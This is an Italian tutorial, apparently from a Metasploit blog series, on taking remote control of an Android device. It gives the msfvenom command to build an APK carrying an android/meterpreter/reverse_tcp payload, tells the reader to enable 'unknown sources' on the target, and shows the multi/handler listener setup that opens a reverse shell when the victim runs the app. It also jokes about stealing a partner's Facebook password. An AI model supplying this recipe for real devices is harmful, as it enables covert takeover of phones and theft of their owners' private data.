Nelle guide passate della rubrica su Metasploit Framework, abbiamo analizzato varie possibilità di azione del software, concentrandoci maggiormente sugli attacchi rivolti verso i PC Windows, eccetto in qualche caso. Negli ultimi anni, il mercato ha aperto le sue porte a smartphone e tablet, dispositivi che hanno guadagnato velocemente sempre più popolarità, surclassando i genitori computer soprattutto per quanto riguarda l’utilizzo della rete.
Per un hacker, come per una multinazionale, lasciarsi sfuggire questa importante fetta di mercato, equivarrebbe a rimanere indietro con i tempi, essendo inevitabilmente destinati a soccombere. È per tale motivo che in questo tutorial voglio riproporvi la prima guida della rubrica, rivisitata in chiave mobile.
Il procedimento non si differenzia di molto da quello descritto in precedenza, eccetto per un paio di passaggi dove la parola Android prenderà il posto della parola Windows.
Ricordiamoci che essendo puramente a scopo di test, questa guida trova ben poche applicazioni nel mondo reale. Del resto, in quanti pensate che possano avviare un programma o un’applicazione che non serve letteralmente a nulla, se non a concedere l’accesso ad estranei al proprio dispositivo? La risposta a questa domanda sarebbe più adatta ad un saggio sulla Social Engineering che sull’Exploitation, quindi concentriamoci su come guadagnare l’accesso al dispositivo mobile, più che sull’appropriarsi indebitamente della password di Facebook del proprio partner, non dimenticando il fatto che, una volta ottenuto l’accesso remoto al dispositivo, il resto sarà un gioco da ragazzi.
Creare un apk infetto
Iniziamo creando un apk da installare sul dispositivo vittima. Apk (Android Package) è l’estensione che contraddistingue gli archivi delle applicazioni Android. Come per gli eseguibili di Windows, Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.
msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] -o [nome_file].apk
Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.
Abilitare “Origini sconosciute” su Android
Attenzione: il file contenente il payload non risulta firmato, quindi dobbiamo disattivare il controllo delle fonti sicure per poter installare il file apk sul device. Per farlo andiamo su Impostazioni -> sicurezza e attiviamo la voce Origini sconosciute.
Impostare l’handler
Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole
e impostiamo un handler generico per android
use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST [ip_macchina_attaccante] set LPORT [porta_per_la_connessione] run
Scaricare e installare il payload
Passiamo sul dispositivo mobile, scarichiamo il file apk appena creato e lo installiamo. Non avendo un dispositivo Android a disposizione, mi sono appoggiato ad una macchina virtuale.
Successo!!
Non appena la vittima avvia l’applicazione denominata MainActivity, lo smartphone o il tablet sono sotto il nostro controllo